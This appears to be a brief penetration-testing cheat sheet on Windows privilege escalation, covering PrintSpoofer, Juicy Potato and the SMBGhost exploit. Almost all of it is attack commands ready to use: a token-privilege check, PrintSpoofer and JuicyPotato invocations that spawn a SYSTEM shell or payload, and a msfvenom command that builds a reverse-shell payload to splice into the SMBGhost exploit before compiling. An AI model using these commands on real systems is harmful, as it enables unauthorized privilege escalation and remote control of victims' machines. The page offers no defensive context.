Tools

PrintSpoofer

User enum

whoami /all

if SeAssignPrimaryToken or SeImpersonate you're good to go (Y)

Execute the following command:

PrintSpoofer.exe -i -c cmd

Juicy Potato

User enum

whoami /all

if SeAssignPrimaryToken or SeImpersonate you're good to go (Y)

Check for the OS system, and then use the CLSID from:

Execute the following command (using you CLSID):

juicypotato.exe -t <u/t> -p <file to execute> -l <port> -c "{<CLSID>}"
juicypotato.exe -t * -p C:\Windows\Temp\8009.exe -l 6989 -c "{1ecca34c-e88a-44e3-8d6a-8921bde9e452}"

SMBGhost

Starting with line 204 in exploit.cpp, replace the shellcode with a reverse shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -f csharp

Using Visual Studio set the target to x64 and Release and compile the exploit.

Last updated